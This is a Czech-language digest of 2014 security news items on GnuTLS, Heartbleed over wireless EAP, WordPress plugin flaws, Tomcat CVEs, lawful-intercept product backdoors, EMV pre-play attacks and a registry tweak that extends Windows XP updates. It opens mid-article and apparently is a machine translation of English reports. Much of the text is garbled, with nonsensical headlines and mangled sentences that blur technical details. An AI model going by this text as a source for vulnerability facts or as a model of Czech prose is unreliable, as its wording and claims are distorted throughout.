Odborníci vyvrátit počáteční srovnání na Apple gotofail , poukazuje na to, že zatímco útočník v pozici man-in-the-middle by mohl zachytit provoz a zavést škodlivý certifikát, že je místo, kde podobnost končí.

Zatímco příkaz goto se objeví v kočárku kódu v obou zranitelnosti, GnuTLS chyba souvisí s nesprávným zacházením chyb. Buggy kód je určen vrátit buď true nebo false proměnné v závislosti na platnosti certifikátu. Místo toho se vrátil specifické chybové kódy, které v booleovských pravidel, jsou interpretovány jako platí bez ohledu na to, zda je kód chyby negativní.

"Pod booleovských pravidel, něco, co není nula je" pravda, "řekl Veracode bezpečnostní výzkumník Melissa Elliott Threatpost v té době. "Proto, chyba chtěl ukázat, selhání by být předány do řetězce jako" pravda "(bez chyby) namísto" nepravých "(chyba)."


WordPress All-In-One SEO balíček Chyby opravené
4.6.2014 Zranitelnosti
Web design firma oprava dvě zvýšení úrovně oprávnění chyby, které by vedly ke cross-site scripting útoky v populární WordPress plugin, který spravuje. Zůstane-li unpatched, by problém nechat potenciálně miliony webových stránek zranitelné.

Problém se vyskytuje ve starých verzích vše v jednom SEO Pack, plugin, který optimalizuje WordPress pro vyhledávače. Semper Fi, vývoj webových aplikací společnosti na starosti dohled nad několika WordPress pluginy, řídí plugin.

Zatímco tam jsou asi 73 milionů webových stránek na internetu, v současné době běží WordPress, asi 20 procent z nich, 15 milionů nebo tak, použijte vše v jednom SEO Pack dělat to jeden z Content Management platformy prvních pět nejpopulárnějších pluginů.

Marc-Alexandre Montpas, výzkumník v bezpečnostní firmě Sucuri, řekl, že jeho výzkumný tým objevil zranitelnost minulý týden při auditu kód společnosti. Montpas diskutovány je v blogu publikoval přes víkend.

Tato chyba zabezpečení může zřejmě dovolit uživateli bez oprávnění správce, který se přihlásil k WordPess webu upravovat parametry plugin. Uživatel může jít na vyladění příspěvky "SEO tituly, popisů a klíčových slov meta tagy. I když tyto akce jsou většinou jen všetečný, by mohly být problematické pro stavbyvedoucí.

Snad ještě více alarmující je skutečnost, že podle Sucuri chyba zabezpečení může být spojen s jiným zranitelnosti a používá ke spuštění škodlivého kódu JavaScriptu v admin panelu. V důsledku toho by útočník mohl změnit admin heslo nebo zavést backdoor v jednom ze souborů lokality vyvolat k pozdějšímu datu.

Semper Fi byla rychlá oprava problémy. Je vytlačena pevné verzi, 2.1.6, v neděli, která řeší problémy Sucuri spolu s hrstkou dalších oprav chyb hlášených uživateli v podpůrných fórech společnosti.

Uživatelé WordPress by měl být schopen aktualizovat svůj plugin po přihlášení do svého administrativního panelu WordPress, bude vše v jednom plugin, jít na rozevírací seznam v horní nebo dolní části stránky a klepnutím na tlačítko "Update." Uživatelé mohou také zamířit do WordPress " plugin adresář .

Chyby ve WordPress pluginy se bohužel staly samozřejmostí. V únoru, Duo Security ukázal, že tam byl problém v jeho plugin, který by mohl nechat dvoufaktorovou autentizaci uživatele bypass na vícemístných sítích.

Výzkum papír v loňském roce, "Bezpečnostní stát WordPress 'Top 50 pluginů," zdůraznil , že zranitelné WordPress pluginy byly staženy osm milionů časy, něco, co je vedlo k množství vysokých profilových útoků a ještě více webových stránek kompromisů v průběhu let.


Heartbleed Využitelné Přes podniku Bezdrátové sítě
3.6.2014 Zranitelnosti
Bez ohledu na to, že zápal nad Heartbleed OpenSSL zranitelnosti zemřel dolů výrazně, záplatování chybu by měl zůstat nejvyšší prioritou pro podniky, protože výzkumníci i nadále hledat nové zneužít vektorů.

Poslední si bere na mušku Heartbleed přes bezdrátové sítě. Výzkumník se Portugalsko na základě poradenské Sysvalue sdílí detaily útoků se volá Cupid, v němž se postavil patche, které upravují hostapd a WPA-supplicant, dva programy, které fungují jako bezdrátového přístupu a správu autentizace bodů. hostapd , například, zřizuje konfigurovatelné přístupový bod; to je podporované na Linuxu. Hackeři by mohl vytvořit bezdrátovou konfiguraci svého výběru sítě, který by umožnil zranitelné klienti se k němu připojit. Wpa_supplicant, také podporována v systémech Linux a Android, se používá pro připojení k bezdrátovým sítím.

"My Amor patch je řada změn těchto programů se spouští zranitelnosti s cílem ověřit zranitelných klientů a serverů," řekl vědec Luis Grangeia Threatpost.

Útoky Grangeia je využívat Heartbleed bez založení plnou TLS handshake.
Útoky Grangeia je využívat Heartbleed bez založení plnou TLS handshake, posílání nedovoleného požadavek na srdeční hned po Client Dobrý den, před byly vyměněny veškeré šifrovací klíče nebo certifikáty, řekl. Toto chování, mezitím je výslovně zakázáno ve specifikaci TLS .

Heartbleed je zranitelnost v některých OpenSSL implementace. Navzdory dostupnosti náplasti a povzbudivé čísla sanačních z několika zdrojů, byly útoky byly stupňující se proti VPN infrastruktury , kritických průmyslových řídících systémů a další, kromě zranitelných webových serverů.

Heartbleed je využít proti problému funkčnosti srdeční OpenSSL je , které, pokud je povoleno, vrací 64KB paměti ve formátu prostého textu do libovolného klienta nebo serveru žádosti o připojení. Už tam byly zprávy o útočníky pomocí Heartbleed ukrást uživatelská jména, ID relace, pověření a další data ve formátu prostého textu v případě, že útok se opakuje tolikrát. Více kriticky, vědci také byli schopni dát dohromady dostatek informací, aby úspěšně se množit soukromou SSL klíč .

Grangeia řekl, že má ještě analyzovat výpisy paměti se mu podařilo shromáždit.

"Můj názor na uvolnění [proof of concept] kód je dostat více lidí, kteří pracují na testování různých konfigurací a analyzovat výsledky," řekl.

V Grangeia útoku, spojení TLS se neprovádí přes TCP, ale spíše přes EAP, bezdrátové sítě rámci ověřování. Některé kabelové sítě postavené na protokolu 802.1x a peer-to-peer připojení také pomocí EAP; EAP-PEAP, EAP-TLS a EAP-TTLS připojit přes TLS, řekl.

"Chcete-li využít zranitelné klienty, hostapd (s Amor náplasti) mohou být použity k nastavení" zlo "sítí tak, aby, když zranitelný klient pokusí připojit, a požádá o připojení TLS, bude hostapd posílat škodlivé žádosti tlukot srdce, což vyvolalo zranitelnost, "Grangeia vysvětlil na jeho internetových stránkách . "Chcete-li využít zranitelných serverů můžeme použít wpa_supplicant s Amor náplasti. Požadujeme připojení k síti zranitelné a pak poslat srdeční žádost ihned po připojení TLS je vyroben. "

Útoky pracovat v sítích chráněné heslem, protože chyba je spuštěn dříve, než by uživatel musel ověřit, řekl.

Grangeia poukázal na to, že výchozí instalace obou rozhlasových programů lze využít na Ubuntu Linux běží zranitelné verze OpenSSL. Řekl, že Android 4.1.0 a 4.1.1. také loď s zranitelné verze OpenSSL a použití wpa_supplicant pro připojení k bezdrátovým sítím, a může být zranitelný stejně. Grangeia řekl, že nebyl schopen otestovat zranitelných verzí Androidu.

"To musí být testovány v praxi, jak Google (nebo jiný výrobce telefonů) by sestavili OpenSSL se rozšíření srdeční tep vypnutý," řekl.

Do té doby, správci podnikové sítě by měly být dvojí kontroly jejich bezdrátových nasazení.

"Vlastně jsem přesvědčen, že nejzávažnější útoku, jsou zranitelné firemní bezdrátové řešení a Network Access Control řešení," řekl. "Prodejci by měli zkontrolovat jejich firmware a informovat zákazníky, protože tato chyba zabezpečení má potenciál dát útočníkům otevřené dveře do sítí svých zákazníků."


Některé průmyslové systémy stále ohroženy Heartbleed
30.5.2014 Zranitelnosti
Nebezpečí z Heartbleed prošel pro většinu uživatelů internetu, ale provozovatelé Průmyslové řídicí systémy (ICS), nejsou takové štěstí.

US ICS CERT vydal v úterý poradní o tom, jak vada stále ovlivňuje některé ICS systémy a jaké jsou jeho provozovatelé by měli udělat, aby se to hned. "ideální ICS síť je izolován od podnikové sítě a obsahuje málo k žádné externí komunikační spojení; Nicméně, obchodní nároky vyžadující zvýšenou komunikaci s ICS sítě z externích sítí. Tyto externí komunikační spoje jsou citlivé na OpenSSL zranitelnosti, které by mohly být použity k exfiltrate pověření pro přístup do složek na síti ICS, "poznamenal tým. " OpenSSL chyba může být přítomen v hostitelích, klienty a klientský software. Pokud jsou pověření sítě ICS exfiltrated, které může být provedeno s úspěšným využíváním OpenSSL zranitelnosti, je možné, aby útočník vykonávat podstatnou kontrolu nad ICS síti. To je velmi běžné pro sadu pověření ICS mít téměř neomezený přístup k celé síti ICS, který je odlišný od IT sítí, které se obvykle omezují přístup uživatele k provedení konkrétních pracovních povinností. " tým poskytuje aktualizovaný dokument se seznamem dodavatelů a jejich produktů, Informace o tom, zda byly ovlivněny zranitelností a zda oprava je. "vlastníci aktiv a subjekty, které jsou jisti zranitelnosti ICS síťových zařízení, nebo pokud se domníváte, že síťové zařízení obsahující OpenSSL chybu, by měli kontaktovat své dodavatele produktu, "říká poradní, a konstatuje, že" může být nutné skenovat zařízení používaná ve svém ICS prostředí, pokud budou na konci jejich životnosti zařízení nebo jejich prodejce nekomunikuje s nimi na toto téma. " Ale tým varuje: "ICS -CERT upozorňuje, že všechny skenování ICS zařízení pro Heartbleed být provedeno v izolované testovací laboratoři, nikoliv v produkčním prostředí. Pokud testovací prostředí není k dispozici, pak dodavatel zařízení by mělo být kontaktován. Pokud je možné, aby skenování zařízení, je možné, že zařízení může být uvedeno do neplatného stavu způsobuje neočekávané výsledky a možného selhání bezpečnostních ochranných opatření. " Mají výčtu řadu aktivních a pasivních nástrojů, skenování, které by mohly být použity pro daný úkol, zahrnovaly minimalizaci rizik opatření, aby provozovatelé ICS může trvat, a poskytly podpisy detekce.


OpenSSL dostává finanční prostředky pro vývojáře, projde bezpečnostní audit
30.5.2014 Zranitelnosti
Sotva měsíc poté, co oznámil vytvoření skupiny, která má pomoci financovat open source projekty, iniciativa Základní infrastruktura se rozhodla poskytnout projektu OpenSSL s dost peněz najmout dva vývojáře na plný úvazek, a také bude financovat audit OpenSSL u otevřeného Crypto Audit projektu.

CII je podpořena tím, kdo je kdo z tech firem, včetně Google, Microsoft, IBM, Linux Foundation, Facebook a Amazon, a skupina přidal několik nových členů tento týden, stejně. Adobe, Bloomberg, HP Huawei a Salesforce.com se připojil k CII a poskytne finanční podporu.

Oznámení z CII přichází v době, kdy jsou hlavní otázky, vířící kolem crypto projektů. Ve středu, hlavní TrueCrypt webové stránky a Sourceforge strana začala nést zprávu, varující uživatele, že šifrovací balíček open source není bezpečné a může obsahovat neopravených chyb zabezpečení. Totéž se též objeví varovný instalační obrazovce TrueCrypt 7.2, novou verzi, která byla podepsána s platným šifrovacím klíčem projektu. Před měsícem, OCAP vydala první zprávu, že v první fázi svého auditu TrueCrypt se objevilo žádné zadní vrátka nebo jiné znepokojivé zranitelná. Bezpečnostní experti pro let přemýšlel o integritu softwaru, jako jeho vývojáři jsou anonymní a TrueCrypt nikdy prošla vnější audit.

Nyní, OCAP tým, který zahrnuje Johns Hopkins profesor a cryptographer Matthew Green a Kenn White, bude mít peníze na financování audit OpenSSL, stejně. OpenSSL vzal velký hit na začátku tohoto roku se zjevení Heartbleed zranitelnosti , které poslal na internet do panice, protože software běží na více než 60 procent SSL chráněných lokalit.

"Ať se nám to potvrdí, nebo ne, bezpečnost dnešního internetu je závislá na malém počtu open source projektů. Tato iniciativa staví zdroje s cílem zajistit dlouhodobou životaschopnost těchto projektů. To z nás dělá všechno mnohem bezpečnější, "řekl Green.

Kromě financování OpenSSL je audit, CII také se dopouští peníze Network Time Protocol a OpenSSH.

CII je také spáchání peníze Network Time Protocol a OpenSSH.
"Veškerý vývoj software vyžaduje podporu a financování. Open source software není výjimkou a zaručuje úroveň podpory na par s dominantní roli, kterou hraje podporuje dnešní globální informační infrastrukturu, "řekl Jim Zemlin, výkonný ředitel The Linux Foundation. "CII implementuje stejný společný přístup, který se používá k vytvoření software, který pomůže financovat nejdůležitější projekty. Cílem KII je přejít od reaktivní, reakce vyvolané krizí na měřené, proaktivní způsob, jak identifikovat a financovat takové projekty, které jsou v nouzi. Jsem nadšená, že nyní máme fórum pro připojení lidem v nouzi s těmi, s fondy. "

CII také přidal několik nových poradců, včetně Green, Bruce Schneier, Eben Moglen z Kolumbijské univerzity a Ted T'so společnosti Google.

"Je to důležitý krok ke zlepšení bezpečnosti na internetu. Jsem rád, že technologické společnosti, které spoléhají na bezpečnost open source softwaru investuje do těchto cenných papírů, "řekl Schneier.


Apache Záplaty DoS, zpřístupnění informací Chyby v Tomcat
30.5.2014 Zranitelnosti
Apache nedávno oprava Tomcat , kterým trio informačních zveřejňování chyb a odmítnutí služby chyby v open source webový server a servlet kontejneru.

Odmítnutí služby chyby, objevené v únoru David Jorm na Red Hat Security Response Team, by umožnily útočníkovi vytvořit chybně velikost bloků v rámci blokového požadavku, který by si dovolil neomezené množství dat, které mají být streamované na server. To by se obešel omezení velikosti vynuceny na vyžádání a vyvolalo odmítnutí služby.

Chyby opravené v Apache TomcatNa zveřejnění informací chyby - všechny objevené bezpečnostní tým Tomcat - mohla v podstatě povoleno útočníkovi obejít limity stanovené tímto softwarem.

První z nich (CVE-2014-0096) Mohl jsem nechat škodlivý Web App Bypass omezení v přístupu k souborům stanovené správcem zabezpečení pomocí externích položky XML. Druhý (CVE-2014-0119) by si dovolil totéž, obchvat limitů stanovených v XML externích identit, ale také možnost viditelnost z XML souborů zpracovaných pro jiné webové aplikace nasazených na stejné instance Tomcat.

Poslední zpřístupnění informací chyba (CVE-2014-0099) se zabýval problémem ve způsobu, jakým je kód použitý analyzovat záhlaví délky obsahu žádosti. Nebylo kontrolu přetečení, když bylo vše řečeno a uděláno. To vedlo k požadavku pašování zranitelnost webového serveru bylo za reverzní proxy, která správně zpracované záhlaví délky obsahu. Žádost o pašování zranitelnosti, je-li předloženy údaje neúplně analyzován pomocí systému HTTP jako proxy server, může být složité a vedou k hrstce dalších útoků, jako je cache poisoning, neoprávněným přístupem a cross-site scripting (XSS) útoky.

Na zveřejnění informací chyby, zatímco objevil v únoru, březnu a dubnu, nebyly zveřejněny až v úterý, spolu s odepřením vydání služby.

Uživatelé zranitelných verzí, 8.0.0-RC1 na 8.0.3 , 7.0.0 až 7.0.52 a 6.0.0 až 6.0.39 , jsou vedeni k aktualizaci na nejnovější staví ke zmírnění chyby.


vzdáleně zneužít Selhávání Haunt Zákonný odposlech Surveillance Gear
29.5.2014 Zranitelnosti
Malá, ale rostoucí, skupina společností, které poskytují tzv. zákonné intercept zařízení na zpravodajských agentur a donucovacích organizací po celém světě operovali převážně pod radarem až do nedávné doby. Jejich výrobky se používají pro záznam a kontrolovat komunikaci podezřelých zločinců a teroristů, ale teď jsou zjišťují, že jejich výrobky dostávají pod kontrolou výzkumná obec zabezpečení.

Jedna ze společností zabývajících se prodejem tohoto dohledu zařízení je NICE Systems, firma New Jersey s několika dceřinými společnostmi. Společnost prodává širokou škálu produktů, z nichž některé jsou navrženy tak, aby "získat umístění cílové, vztahy a obsah konverzace z jakéhokoliv typu komunikace včetně faxu, pevné a mobilní telefonie, a internetových aplikací". Výzkumníci z SEC Consult, bezpečnostní poradenství, objevil širokou škálu zranitelností v některých zákonných radiové produktů Nice, které umožňují vzdálené, neověřené útočníci získat a poslouchat hlasové záznamy každého uživatele pomocí databáze a přístup k produktům na úrovni systému.

Existuje devět samostatných zranitelnosti v NICE nahrávání eXpress hlasové nahrávání výrobku, z nichž nejzávažnější jsou kořen backdoor účet a vzdálené, neověřený přístup k hlasové nahrávky na dotčených výrobků.

Útočníci jsou schopni zcela ovládnout hlasový záznam / sledovací řešení
"Útočníci jsou schopni zcela ovládnout hlasový záznam / dohledu řešení, jak mohou získat přístup k systému a úrovni databáze a poslouchat nahraných hovorů bez předchozího ověření. Kromě toho, útočníci by mohli použít pro nahrávání hlasu server jako jumphost pro další útoky vnitřního Voice VLAN, v závislosti na nastavení sítě, "SEC Poraďte poradní říká.

Výzkumníci nejprve kontaktovat NICE o zranitelnosti v polovině prosince a prošel dlouhým procesem tam a zpět s prodejcem o chybách, které výrobky byly postiženy, a když bude propuštěn skvrny. Po více než šest měsíců bez plného rozlišení, SEC Consult vydala své poradenství ve středu. Nejméně pět slabých míst zůstává unpatched, včetně neověřený přístup k hlasové nahrávky.

To zranitelnost by v podstatě umožní každému útočníkovi přístup a poslech nahrávek hovorů se zaměřuje na ".

Například neověřených útočníci jsou schopni získat přístup k vyvážené seznamy uživatelských účtů, které jsou sledovány / zaznamenán. Útočníci získat přístup k podrobným informacím, jako jsou osobní údaje, jako první / poslední jméno, e-mailovou adresu a uživatelské jméno / rozšíření, "říká poradní.

"Kromě toho, že je možné získat přístup k _unauthenticated_ zaznamenaných hlasových hovorů jiných uživatelů. Tyto výzvy budou uloženy v dočasném adresáři, pokud byly přístupné uživateli přes integrovaný přehrávač médií ve webovém rozhraní. "

Kromě toho, že vada, kořen backdoor chyba také může poskytnout útočníkovi snadný přístup k produktům.

"Databázové tabulky MySQL" usr "obsahuje" root "uživatele s USRKEY / ID uživatele s administrátorskými přístupovými právy. Tento uživatelský účet nezobrazuje v menu "Správa uživatelů", při přihlášení jako uživatel účtu správce ve webovém rozhraní. Proto heslo nemůže být změněny, "říká poradní.


Microsoft myBulletins Service Přizpůsobí Patch Podrobnosti
29.5.2014 Zranitelnosti
Microsoft dnes zveřejnila své nové myBulletins služby, rozhraní, kde IT administrátoři mohou upravit informace o aktualizaci s opravou zabezpečení.

A zároveň poskytuje uživatelům s hladkou rozhraní, které umožňuje rozsáhlé filtrování náplasti informací o produktech v použití uvnitř podniku nebo malé firmy, někteří uživatelé byly ponechány dutý.

"Pro mě to byla chybějící dvě nejdůležitější věci: Notifikace a bezpečnostních rad," řekl Andrew Storms, ředitel DevOps pro CloudPassage.

Informační zpravodaje zabezpečení se liší od zátah měsíčních bezpečnostních bulletinů, které doprovázejí aktualizace zabezpečení Patch Tuesday; návěstí může varovat uživatele zero-day zranitelností ve Windows, Internet Exploreru nebo jiných softwarových produktů společnosti Microsoft. Další nedávné návěstí poskytují správcům s heads-up, pokud jde o změny v tom, jak společnost Microsoft zpracovává starší šifrovací algoritmy, jako je například RC4 nebo odmítání starších hash, jako MD5 .

Microsoft uvedl, že myBulletins byl postaven na základě zpětné vazby od uživatelů a umožňuje správcům přizpůsobit bulletiny, které jsou pro jejich společnosti. Uživatelé potřebují přihlásit pouze pomocí účtu Microsoft a vybrat produkty a verze v použití v jejich IT obchodech, aby si displej z bulletinů, které se vztahují na tyto produkty.

"Sdílená jste, že jste potřebovali schopnost proplout složitosti a rozhodovat se rychle," napsal Tracey Pretorius, ředitel, Microsoft Trustworthy Computing. : Chtěl jste pomoci identifikovat informace, které jsou nejvíce relevantní pro vaši organizaci. Slyšeli jsme tě a choval se na vaše názory. "

Uživatelé mají celou řadu vyhledávání a filtrování možností, řekl Microsoft, a může upřednostnit bulletiny podle data vydání, závažnosti a restartu požadavků.

Mnoho z těchto stejných možností, nicméně, jsou k dispozici v systému Windows Server Update Services (WSUS). Většina organizací, které pracují velké množství počítačů a serverů se systémem Windows pomocí služby WSUS pro správu záplat distribuci.

"To není jasné, proč bych ji použít na WSUS," řekl Storms. "Plus WSUS mi poskytuje žalovatelné [inteligence] na to, co systémy musí co nášivky. WSUS umožňuje zvolit, jaké produkty k odběru. Je to táhne patche, distribuuje je a řekne vám, co systémy potřebují aktualizace. "

"MyBulletins je určen pro IT profesionály, kteří jsou odpovědní za průběžné konkrétní řízení bezpečnosti aktualizací v rámci svých organizací," řekl Pretorius. "Věříme, že to je užitečné on-line službu pro správce v podniku nebo malých a středních podnikových prostředích. To je debut verze on-line služby a vítáme a vážíme si zpětnou vazbu o tom, jak tato služba ještě lepší kupředu. "

Nedostatek oznámení je nepříjemná, protože uživatelé budou muset načíst palubní desku myBulletins, aby bylo možné zjistit, zda jsou k dispozici nové bulletiny zabezpečení.

"Poskytnuté myBulletins je úhledný vyhledávací rozhraní. Je těžké pochopit, proč by bylo užitečné, pokud již používáte službu WSUS, která je zdarma, "řekl Storms.


Životnost Windows XP lze teoreticky prodloužit až do roku 2019

29.5.2014 Zranitelnosti
Jednoduchá úprava oficiálně již nepodporovaného operačního systému uživatelům zajistí přísun bezpečnostních a jiných aktualizací.

Není však jasné, jestli tyto aktualizace uživatele Windows XP skutečně ochrání proti útokům internetových zločinců.

Způsob, jak upravit Windows XP a získat tak opravné aktualizace, se poprvé objevil na jistém německém diskuzním fóru, odkud se pak tato informace začala šířit dále. Kouzlo spočívá v provedení jisté úpravy, díky které si aktualizační služba Windows Update bude myslet, že uživatel ve skutečnosti používá příbuzný systém do vestavěných zařízení Windows Embedded POSReady 2009.

Embedded POSReady 2009 má na rozdíl od Windows XP, jejichž podpora skončila letos 8. dubna, zajištěný přísun opravných aktualizací až do 9. dubna 2019.

Jak z názvu zneužitého systému vyplývá, jde o platformu používanou především v pokladnách (point-of-sale – POS) a bankomatech. Jde o systém založený na Windows XP Service Pack 3, poslední podporované verzi 13 let starého OS.

Jeho aktualizace jsou jakousi nadmnožinou oprav, které by uživatelé Windows XP obdrželi v případě, že by podpora neskončila. Současně jde o podobné, nikoliv však identické aktualizace, které dostávají firemní a vládní zákazníky, kteří si zakoupili prodlouženou podporu pro Windows XP.

Funkčnost a jednoduchost aktualizační modifikace Windows XP přitom překvapila i leckteré bezpečnostní výzkumníky. „Systém je stabilní, bez pádů a modrých obrazovek. Stejně tak se neobjevila žádná varování ani chybové zprávy při použití patchů pro IE a .Net,“ řekl například Jerome Segura z Malwarebytes.

Aktualizaci pro Internet Explorer 8, kterou nainstalovat Segura, se prý zdála být stejné jako ty, co Microsoft vydal pro ostatní verze Windows včetně POSReady 2009. Přesto však Segura před tímto řešením varuje. „POSReady 2009 nejsou Windows XP. Nevíme, jestli aktualizace plně ochrání i uživatele XP,“ uvedl.

Microsoft k celé věci vydal následující vyjádření: „Bezpečnostní aktualizace, které lze nainstalovat, jsou určeny pro uživatele Windows Embedded a Windows Server 2003. Uživatele Windows XP plně neochrání. Uživatelé se navíc instalací těchto balíčků sami vystavují riziku, protože pro Windows XP nebyly opravy otestovány.“

V poslední větě však Microsoft tak úplně nemluví pravdu. Možná netestoval kompatibilitu aktualizací určených pro POSReady 2009 s Windows XP. Zcela jistě však testoval aktualizace pro zákazníky s prodlouženou podporou A kromě toho POSReady 2009 a Windows XP SP3 jsou velmi blízcí příbuzní. Jejich jádro je v podstatě stejné.

A v čem ona kouzelná úprava spočívá? V registru systému stačí vytvořit větev HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady s proměnnou Installed typu dword s hodnotou 1.


Spotify sporná žádost v rozporu Android
28.5.2014
Zranitelnosti
Uživatelé Spotify na Androidu již brzy vyzváni k aktualizaci aplikace po porušení bylo ráno hlášeno technologický ředitel na streamování hudby služeb.

Oskar Stal psal o společnosti, webové stránky , které společnost vyšetřuje neoprávněnému přístupu do svých systémů a interních firemních dat. On také psal, že někteří uživatelé budou vyzváni k resetování hesla.

"Naše důkazy ukazují, že byla zobrazena pouze jeden datový Spotify uživatele, a to nezahrnuje žádné heslo, finanční a platební údaje," řekl Stal. "Kontaktovali jsme tuto jednu osobu. Na základě našich zjištění, nejsme vědomi jakéhokoliv zvýšeného rizika pro uživatele v důsledku tohoto incidentu. "

Spotify je omezení aktualizace pouze jeho uživatele Android, a nedoporučuje žádnou akci pro iOS a Windows Phone uživatelům.

Android uživatelé budou vyzváni k inovaci v nejbližších dnech
Android uživatelé budou vyzváni k inovaci v nejbližších dnech, řekl Stal.

Spotify šéf amerického komunikační Graham Jones nebude odpovídat na otázky prostřednictvím e-mailu, proč byla pouze aplikace Android aktualizován, proč byl pouze jeden uživatel údajně postiženy, zda aplikace uživatele byla stažena z Google Play nebo třetí stranou, nebo když útok byl objeven.

"Nepůjdeme do dalších podrobností, co je na blogu," řekl Jones.

Spotify, který nedávno oznámil, že má 10 milionů předplatitelů globální, má poměrně klidné bezpečnostní pověst. Jeho poslední veřejně hlásil bezpečnostní incident byl téměř před 13 měsíci, kdy nový Google Chrome plug-in v té době umožnila uživatelům stahovat kopie písní zdarma .

Prodloužení, známý jako Downloadify, byla stažena z Chrome Web Store téměř okamžitě. Plug-in využíván chybu zabezpečení v systému Web-based přehrávače společnosti. Uživatel může využít ji ke stažení MP3 skladby, jak to začalo hrát. Zranitelnost umožnila obejít digitální ochrany pro správu práv souboru. Kopie plug-in byly také nalezeny na weby třetích stran, včetně GitHub.


Adobe Shockwave tahat kolem belhal, Zranitelný verze Flash
27.5.2014 Zranitelnosti

Je to dost špatné, že runtime Flash dodáván s Adobe Shockwave Player je nedostatek bezpečnostních záplat vracet do ledna 2013, ale co je horší je, že zvýšená plocha útok poskytovány Shockwave může usnadnit využití. A v smlouvat, Adobe ví o vydání od října 2010.

"Útočník má nejen útoku Flash, ale všechny Shockwave útoku na jeho likvidaci," řekl Will Dormann, výzkumník v Software Engineering Institute na Carnegie Mellon University. Před týdnem, Dormann aktualizuje CERT upozornění od roku 2012, který byl původně napsaný o dva roky dříve, varuje uživatele, že Adobe ještě nebyl zachycen na nedostatky Shockwave je v tomto ohledu.

Adobe mluvčí Heather Edell řekl Threatpost dnes, že příští verze Shockwave bude obsahovat aktualizovanou verzi Flashe.

"Jsme přezkoumání náš proces aktualizace zabezpečení s cílem zmírnit rizika v Shockwave Player," řekl Edell.

Dormann, zatím, není si jistý, jak moc to pomůže.

"Zprávy naznačují, že Adobe se chystá na uvedení verze Flash až do dnešního dne s další aktualizaci Shockwave," řekl Dormann. "Ale to je jen dočasná oprava, protože Flash a Shockwave mají různé propojovací cykly."

Shockwave byla aktualizována čtyřikrát v posledních 13 měsících, naposledy v únoru.
Shockwave byla aktualizována čtyřikrát v posledních 13 měsících, naposledy v únoru. Flash Player , mezitím, byl aktualizován mnohem více krát-téměř měsíc-včetně záplat pro řadu zero-day zranitelností terčem zločinců a národního státu hackery . Žádné veřejné využije, nicméně byly hlášeny, které se zaměřují na Flash Player dodáván s Shockwave.

"Tam může být okamžik, kdy verzi Flash poskytuje Shockwave byl" dohnaly "se samostatnou verzi," řekl Dormann. "Ale jak můžete vidět, situace se od té doby změnilo. Architektura, ve kterém Flash je poskytována Shockwave je stále stejný. "

Přispívat do problému je skutečnost, že některé Shockwave moduly nemusí rozhodnout v některých snižující závažnost rizika Windows, Dormann řekl, kdo poukázal na jednu zejména názvem SafeSEH. Zmírnění dělá to obtížnější a nákladnější pro útočníkovi použít strukturované zpracování výjimek (SEH) přepsat vykořisťování techniku ​​spustit kód na základní operační systém.

"To znamená, že útočník může snadno použít SEH-přepsání zranitelnosti (např. přetečení bufferu), ve využívání když se aplikace Flash je napaden prostřednictvím Shockwave, ale že stejný útok, nemusí být stejně životaschopné, pokud je blesk zaútočil přímo," řekl Dormann. Jeden dočasné zmírnění, Dormann doporučuje, je nasadit Microsoft Enhanced Experience Toolkit pro zmírňování nebo Emet, který bude nutit k používání SEHOP nebo SEH ochraně proti přepsání .

Není známo, zda Adobe vydá nouzový aktualizace pro Flash, nebo v případě, že bude čekat až do června 10; Adobe koordinuje plán náplast uvolňuje a aktualizace zabezpečení, které se shodují s Patch aktualizací Microsoft v úterý.

Poslední nouzové aktualizace Flash byl propuštěn v únoru zalátat zero-day zranitelnost zneužívanou podle The Mask APT kampaně zveřejněných společností Kaspersky Lab.


Výzkumníci objevit kritické chyby v čipu a PIN systému
27.5.2014 Zranitelnosti
Skupina vědců z Cambridgeské univerzity objevili dva kritické nedostatky v "Chip a PIN" (EMV), platební systém čipové karty, které lze tak efektivně, že normální bankovní postupy nebudou na místě falešný zneužity k "klon" karty. "platby karty obsahují čip, aby mohli provést ověřovací protokol. Tento protokol vyžaduje point-of-prodeje (POS) terminály a bankomaty pro generování kódového slova, tzv. nepředvídatelné číslo, pro každou transakci, aby bylo zajištěno, že je čerstvá, "vysvětlil vědci. "platební terminál provede EMV protokol s čipem, který výměny vybrané transakční údaje o uzavřených s kryptografickým autentizačního kódu zprávy (MAC) vypočítané pomocí symetrického klíče uložené na kartě a sdílet s bankou, která kartu vydala." Uživatel je ověřen pomocí PIN. EMV je považován za bezpečnější varianta než "karty výpad" platebního systému obvykle nacházejí v USA, ale není to full-důkaz. Ve skutečnosti, výzkumné týmy z Cambridgeské univerzity objevili další zranitelná místa systému v uplynulých letech. Tentokrát, oni objevili, že některé bankomaty generovat špatné náhodných čísel, které lze snadno předvídat a mohou být použity k výpočtu autentizační kódy potřebné k tomu hotovosti z bankomatu, že v pozdější době. Tento typ "pre-play" útok by "k nerozeznání od karty klonování z hlediska protokolů dostupných na břehu vydavatele karty, a může být provedena, i když to je nemožné klonovat kartu fyzicky, "dokazuje, že alespoň v některých z těchto případů podvodů, majitelé karet nebyli odpovědní za spoluvinu na podvodu, a měla by být dána vrácení peněz. Druhý problém, který se objevil, je selhání protokol který by umožnil malware v terminálu ATM nebo POS, nebo AA man-in-the-middle mezi terminálem a nabyvatele, provádět pre-play útok, jen tím, že nahradí náhodně generované číslo s jedním zvoleným útočníkem. Tyto nedostatky byly objeveny před více než dvěma lety, a banka průmyslové organizace byli informováni na začátku roku 2012. Do té doby, pouze první chybou bylo určeno. "Nyní publikování výsledků našeho výzkumu tak, že zákazníci, jejichž nároky na náhradu byly neprávem odepřen mít důkaz jejich pokračování, a tak, aby crypto, bezpečnostní a regulační bankovní komunity mohou poučit, "oni si všimli. "Pro inženýry, je to fascinující, aby odhalili, proč by byly zavedeny jako hlavní selhání, jak se to mohlo přetrvávají neobjevené tak dlouho, a co to má, aby nám řekli o věrohodnosti. Na vědecké úrovni, to je lekce, jak učit o povaze odvolání v kryptografických protokolech, mezích formální verifikace, a souhru mezi designem protokolů a bezpečnostních ekonomii. " skupina předložila svůj výzkum v pondělí na 2014 IEEE Symposium o bezpečnosti a ochrana osobních údajů. Podrobnější informace o útocích, podívejte se na jejich papír.


Zveřejněny detaily nové chyby v Internet Exploreru 8

23.5.2014 Zranitelnosti
Microsoft ani po půl roce neopravil chybu v zastaralém prohlížeči Internet Explorer 8, proto její objevitelé nyní informace o ní zveřejnili. Nejnovější verze IE dostupná pro uživatele odepsaných Windows XP se tak stává stále nebezpečnější.

